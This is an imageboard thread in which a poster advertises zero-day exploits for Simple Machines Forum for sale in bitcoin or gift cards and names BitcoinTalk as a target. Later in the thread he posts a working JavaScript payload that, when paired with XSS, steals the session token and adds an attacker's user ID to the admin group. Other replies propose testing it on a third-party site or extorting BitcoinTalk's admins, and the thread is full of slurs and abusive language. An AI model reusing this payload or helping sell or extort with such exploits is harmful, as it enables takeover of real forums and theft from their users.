Selling 0day exploit for popular forum software

So, I have a private exploit (well, several viable exploits) for SimpleMachines forums. All versions are affected. I'm willing to sell a maximum of 10 copies (to prevent it from getting over-saturated and leaked)

BitcoinTalk and some other relatively huge sites run this software (google to find some large examples)

I'll provide proof the exploits exist to any potentially serious buyer who can provide proof of funds. BTC or Amazon Gift Card only -- I'm selling this at $500 per copy since I plan to sell 10 copies in total (otherwise I'd want around $5k for this)

The exploits in question allow for authentication bypass, automated admin takeover, XSS, SSRF (Leading to pre-auth RCE), Post-Auth RCE, and a few other bugs.

If anyone is interested or has questions, let me know. If this thread dies you can contact me via email at [email protected]

Generally I'd sell this to Zerodium or ZDI, but these exploit brokers are currently not looking to purchase exploits affecting SMF.

Pic unrelated.

Reddit spacer and tech illiterate probably cannot even code one line of C
go back

Also, I should mention that if you're not willing to go first, I'm happy to use a trusted middle-man or an escrow service

can you fucking stop advertising on Jow Forums?

Not a redditor. I'm a bit rusty when it comes to *chan boards as I haven't used any in over a decade


#include <stdio.h>

int postID = 71446388;
int no_homo;
int main (void) {

if (no_homo != postID) {

printf("Looks like %d is a raging homosexual\n",postID);
}
else {
printf("nope still looks like a homo to me\n");
}
return(0);
}


>>trollface.jpg


anyway, if there's any serious buyers here, hmu and i'll provide proof of 0day.
}

Personally I'd rather have some useful interesting adverts than another 500 itoddler btfo!!! Animeposting retardation threads

Figured Jow Forums is a good place to sell 0day but I guess you guys have turned out to be even bigger crybabies than redditfags

a skiddie unable to use [ code][/code] tags on Jow Forums
cute! now go scam somewhere else, your thread ain't tech

Can you stfu this is not the desktop thread

test it on forum.snahp.it/ or gtfo

>waaaaaaaaa why would you buy my useless shit
> we're the crybabies

back when I used chan boards there was no such thing as tags. This is indeed tech -- I'm willing to discuss the content of the exploits and how they work (just not revealing vuln endpoints or anything of the sort) - regarding your "scam" comment, as previously stated, I'm willing to use a trusted middleman or an escrow service

>forum.snahp.it/

How do I know this isn't your website? For all I know you could just be the admin and could grep the access_log from your httpd in order to get my exploits for free.

lmaooo so i think this comment demonstrates exactly how long its been since ive used Jow Forums


Go show me some of your own exploits before calling my shit useless. I can happily provide scores of exploit CVE's I've published, and news reports accompanying my exploit releases... can you do the same?

Btw, I intend to start using Jow Forums on a regular basis (not just for advertisements)

if anyone is into webapp security, exploit development, and/or bug bounty hunting then hit me up.. maybe we can work on some cool stuff together :)

i can show you muh dick

>sell a maximum of 10 copies (to prevent it from getting over-saturated and leaked)
Lmao, fucking retarded.

how do i know you didn't get your site raped with ""your"" exploit by someone else????

user posts interesting technology thread on technology board, gets told to stop advertising by someone who'd rather argue about android vs iphone

TECHNOLOGY

okay samefag, until OP doesn't record a webm of the thing in use I call BS and a scam
he obviously just wants to advertise here to make money on an "exploit" that likely doesn't even exist.

I'm not asking for source code, but until he shows it being used on a live server this is some grade A+ plus ponzi scheme

Nothing about this thread is tech until OP delivers that demo recording.

I guess you haven't had much experience selling 0day -- even the likes of giant exploit brokers such as Zerodium and TrendMicro's ZDI sell limited numbers of multiple copies to different buyers.

Well, you're just going to have to take my word for this. I can always show you some of my other (public) exploits that I've developed.

yeah I don't get it, this isn't *solely* an advertisement... I'm more than willing to discuss specifics and semantics here, or even just generic stuff like the process for auditing webapps to find 0days in general

I'll quite happily post one of the lower impact exploits here (which can be used standalone to gain access if you have user interaction with an admin) but im not sharing a webm of me exploiting the SSRF because that would LITERALLY be giving you a step-by-step guide on how to get pre-auth RCE.

I'll post the proof of concept for the admin auth bypass if you wish though.

You're literally posting about your 0days on a public website, how dumb can you be?
But sure, show some of your other "exploits".

Provide at least some sort of PoC.

POST BOBS AND VAGENE

I guess the super hacker ran away, time to sleep.

>25 posts
>9 ip's
Sad!

Honestly this isnt the place (anymore). Too much moral faggotry, sheltered underage kids, and corporate shills who get scared at any and all mention of anything illegal. Also this board is tech illiterate, so any such technical exploit would be lost/wasted on them.

find satoshi's IP from bitcointalk if ur so cool

>”i’m An e1337 h4x0r with over 5,000 confirmed kills”
>using Jow Forums to advertise
>thinking anyone here has any money
>crying bc no one takes him seriously
Imagine my shock.

>crying bc no one takes him seriously
No one takes chan seriously anymore (if pol shut down this site would probably die within a week)

>if Jow Forums shut down
god I can dream, less retards in my tech threads and no more paranoia

What tech threads? There may be 1 actual tech thread on Jow Forums at the moment, everything else is just amdrone/incelinside/shill circle jerk

Agreed, only jannies and retards like take it seriously. If Jow Forums was gone then we’d probably see right wing death squads or some shit spark up alongside Jow Forumsommandos itching for action.

The programming thread? I actually see a lot of tech threads, just filter all threads with a female as OP image, a nujak/woja or a pepe. Ignore consumerist threads, desktop threads, dumbphone threads and headphone threads.
Still leaves you with at least 30 topics that are worth to talk about.
Your fault if you let the noise distract you, so you miss the information.

get the god damn fuck off this board

key word, posting ABOUT my 0days, not posting my 0days. Astronomical difference here... how the fuck else do you think 0days get sold? You think buyers from ZDI aren't members of the public?

(pair this with XSS)
function smfInjectAdmin(url, userid) {
var session_key = document.body.innerHTML.match(/sSessionVar: '([a-f0-9]{10})'/)[1];
var session_value = document.body.innerHTML.match(/sSessionId: '([a-f0-9]{32})'/)[1];
var dongs = new XMLHttpRequest();

dongs.open("POST", url +'/index.php?action=moderate;area=viewgroups;sa=members;group=1');
dongs.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
dongs.send(
'member_add[]='+ userid +
'&add=Add+Members'+
'&'+ session_key +'='+ session_value +
'&toAdd='
);
}


>imagine thinking shit-tier troll posts such as this even warrant any kind of noteworthy response

>Imagine being such nu-Jow Forums taking everything for granted.
For wanting PoC, details or a presentation of the code being used?

Thanks, finally we're getting to an interesting and fun thread.

>imagine covering up being this retarded by being this pedantic
Op isn't going to post the thing he's trying to sell you fucking mong

>Op isn't going to post the thing he's trying to sell you fucking mong

He can still record it being used without disclosing the code.

How fucking stupid are you? Ever been to DEFCON? Then bugger off, neo gent ribbitor.

If this really worked on btctalk it's worth a lot more than $500. Extort the admins there instead of selling it here.

Thanks for namefagging so I can filter you. Enjoy your ban.

Oh wow you are a bluehat faggot that sucks dick and is retarded enough to post on a glowing honeypot. Good going, jackass.

I'm having a hard time seeing who else but power tripping spergs would care for something like this.

>ever been to this specific event that is my personal benchmark for whether or not ur A rEaL HaCKeR?

kill yourself

Sure, you first :^)